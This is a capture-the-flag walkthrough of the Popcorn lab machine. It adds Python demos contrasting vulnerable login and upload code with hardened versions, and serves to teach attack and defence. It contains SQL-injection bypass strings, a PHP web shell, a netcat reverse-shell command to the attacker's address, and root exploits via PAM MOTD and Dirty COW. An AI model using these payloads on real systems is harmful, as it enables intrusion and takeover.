Popcorn was quite a fun one, and the second machine (going top-down) that is not pwnable just by firing off some Metasploit modules.
IP: 10.10.10.6
OS: Linux
Enumeration:
Nmap reveals a web server on port 80. Browsing to the homepage shows a default Apache installation page with no content. Since port 80 is open, we brute-force the web directories with gobuster and dirbuster (nikto did not work here). We find /torrent, which is running Torrent Hoster.
Exploitation:
To log in, you can do basic manual SQL injection or run sqlmap against a captured POST request. In the Username field use `user' or 1=1 LIMIT 1;#` and anything (e.g. `password`) in the Password field; alternatively, intercept the login request, append `'-- -` to both the username and password values, forward it and turn intercept off. Either way the quote closes the string literal and the rest of the WHERE clause is commented out, so the first row (admin) is returned and we are logged in as admin.
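To make clear why those two payloads log us in, here is an added example (not Torrent Hoster's code; its schema and hashing are not shown in the writeup) that builds the same kind of concatenated login query and places it beside the parameterized fix. The table, the `admin` row and the password hashing are constructed for the demo. SQLite is used so it runs offline, which means the comment marker is `-- ` rather than MySQL's `#`; the mechanism is identical.

```python
"""Vulnerable login by string concatenation vs. a parameterized one.

Added example, not code from the writeup or from Torrent Hoster.  The
schema, the single admin account and the hashing scheme are assumptions
made for the demo; SQLite comments are '-- ', MySQL would also take '#'.
"""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", _hash("s3cret-not-on-the-page")),
    )
    conn.commit()
    return conn


def _hash(password: str) -> str:
    # Illustrative only; the real application's storage format is unknown.
    return hashlib.sha256(password.encode()).hexdigest()


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Vulnerable: the WHERE clause is built by concatenation, so a quote
    in the username ends the literal and the remainder is parsed as SQL.
    Returns the logged-in username, or None when no row matches."""
    query = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + _hash(password) + "'"
    )
    # With username = "' OR 1=1 LIMIT 1 -- -" the statement becomes
    #   ... WHERE username = '' OR 1=1 LIMIT 1 -- -' AND password = '...'
    # i.e. "give me the first row", which is admin.
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened: bound parameters are sent as data, never parsed as SQL,
    so the same payloads simply fail to match any username."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ("' OR 1=1 LIMIT 1 -- -", "admin'-- -"):
        print(repr(payload), "->", login_vulnerable(db, payload, "anything"),
              "| safe ->", login_safe(db, payload, "anything"))
```

The `admin'-- -` case is the second variant from the writeup: the username literal is closed after `admin` and the password check is commented away entirely, so no valid password is ever needed.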

Next we go to the upload section (http://10.10.10.6/torrent/upload/) and upload a genuine torrent file (an Ubuntu or Kali ISO torrent works). Renaming an image from jpg/jpeg/png/gif to .torrent will not work, as the torrent itself is parsed. Once the torrent is in, its page lets us upload a screenshot image, and that check only looks at the Content-Type the client declares, so it is bypassed with Burp. The application is written in PHP, so we use a PHP reverse shell: Kali ships one, `locate reverse-shell` finds /usr/share/laudanum/php/php-reverse-shell.php. Set your IP and port in it, select it as the screenshot, capture the upload request in Burp, and change the filename from file.png to file.php while leaving Content-Type as the image type before forwarding. Alternatively, upload a file named file.php.png, send the request to Repeater, replace the body with a small PHP web shell that runs the command passed in its `go` parameter, URL-encode it, forward it and turn intercept off.

Success! Looks like our PHP file is on the server.
Start a listener (`nc -lvnp 4444`) and browse to the uploaded file in the /torrent/upload/ directory; the application stores it under a hashed name such as 723bc28f9b6f924cca68ccdff96b6190566ca6b4.php. Clicking the broken [Image File Not Found!] thumbnail on the torrent page requests that file and fires the reverse shell. With the web-shell variant we trigger the connection ourselves by passing the command in the `go` parameter: http://10.10.10.6/torrent/upload/723bc28f9b6f924cca68ccdff96b6190566ca6b4.php?go=nc -e /bin/sh 10.10.14.16 4444 (URL-encode the spaces as %20 or let the browser do it).
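The upload bypass above works because the server trusts a client-supplied header. As an added example (not Torrent Hoster's code, whose exact check the writeup does not show), the following models that class of check beside a hardened version: extension allow-list on the final suffix, magic-byte sniffing that must agree with the declared type, and a server-generated storage name. The PHP payload and the PNG sample are constructed here; the `go` parameter mirrors the web shell the writeup invokes.

```python
"""Weak Content-Type-only upload check vs. a hardened one.

Added example; not the application's code.  Payloads and image bytes are
constructed for the demo.  The weak variant is a model of the bug class,
not a copy of Torrent Hoster's actual implementation.
"""
import os
import secrets

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
GIF_MAGICS = (b"GIF87a", b"GIF89a")

ALLOWED_TYPES = {"image/png", "image/jpeg", "image/gif"}
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
CANONICAL_EXT = {"image/png": ".png", "image/jpeg": ".jpg", "image/gif": ".gif"}

# Constructed samples: a one-line PHP web shell of the kind the writeup
# triggers via ?go=..., and a minimal PNG header.
PHP_SHELL = b"<?php system($_GET['go']); ?>"
PNG_SAMPLE = PNG_MAGIC + b"\x00" * 16


def accept_weak(filename: str, content_type: str, data: bytes):
    """Vulnerable: decides purely on the Content-Type header, which the
    client (or Burp) controls, and keeps the client's filename.
    Returns the name the file would be stored under, or None if rejected."""
    if content_type not in ALLOWED_TYPES:
        return None
    return filename  # shell.php declared as image/png is accepted as-is


def sniff_image_type(data: bytes):
    """Return the image MIME type implied by the file's magic bytes."""
    if data.startswith(PNG_MAGIC):
        return "image/png"
    if data.startswith(JPEG_MAGIC):
        return "image/jpeg"
    if data.startswith(GIF_MAGICS):
        return "image/gif"
    return None


def accept_hardened(filename: str, content_type: str, data: bytes):
    """Hardened: the last extension must be on the allow-list, the bytes
    must look like the declared image type, and the stored name is random
    with an extension chosen by the server, so neither the name nor the
    suffix ever comes from the request."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    sniffed = sniff_image_type(data)
    if sniffed is None or sniffed != content_type:
        return None
    return secrets.token_hex(16) + CANONICAL_EXT[sniffed]


if __name__ == "__main__":
    print("weak     shell.php/image/png ->", accept_weak("shell.php", "image/png", PHP_SHELL))
    print("hardened shell.php/image/png ->", accept_hardened("shell.php", "image/png", PHP_SHELL))
    print("hardened file.php.png        ->", accept_hardened("file.php.png", "image/png", PHP_SHELL))
    print("hardened pic.png             ->", accept_hardened("pic.png", "image/png", PNG_SAMPLE))
```

The server-generated name is what finally defeats the double-extension trick: even a polyglot that carries a real PNG header followed by PHP gets stored as `<random>.png`, which Apache will not hand to the PHP interpreter under a default configuration. Storing uploads outside the web root and serving them through a handler removes the remaining risk.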

We get a limited shell as www-data. We upgrade it to a proper pty with: `python -c 'import pty; pty.spawn("/bin/bash")'`
Privilege Escalation:
`cat /etc/issue` shows that we are on Ubuntu 9.10. Next we look for SUID binaries, which run with their owner's (usually root's) privileges, using `find / -perm -4000 -type f 2>/dev/null`. Nothing interesting turns up. I then ran linuxprivchecker.py: the kernel dates from 2009, so there are two routes, a kernel exploit such as Dirty COW, or the MOTD file-tampering bug in this release's PAM.

`searchsploit motd` returns "Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation". `dpkg -l | grep -i pam` confirms that the installed version is 1.1.0-2ubuntu1, so the box is affected. I copied the exploit to a file named exploit.sh, served it from my machine with Python's SimpleHTTPServer and downloaded it to /tmp on the target.

I made exploit.sh executable, ran it, and boom, we get a root shell! Alternatively, Dirty COW works too: take dirty.c from FireFart's repository ([dirty.c](https://github.com/FireFart/dirtycow/blob/master/dirty.c)), transfer it with SimpleHTTPServer or Apache, and compile and run it on the target (the header of the file gives the gcc line: `gcc -pthread dirty.c -o dirty -lcrypt`). The exploit prompts for a password, backs up /etc/passwd to /tmp/passwd.bak, and adds a user named firefart with uid and gid 0. Restore the backup when you are done so the box is left in a sane state.
We then log in as root with `ssh firefart@10.10.10.6` or `su firefart`, using the password chosen during the exploit ("password" here).
And we finally find the root flag :)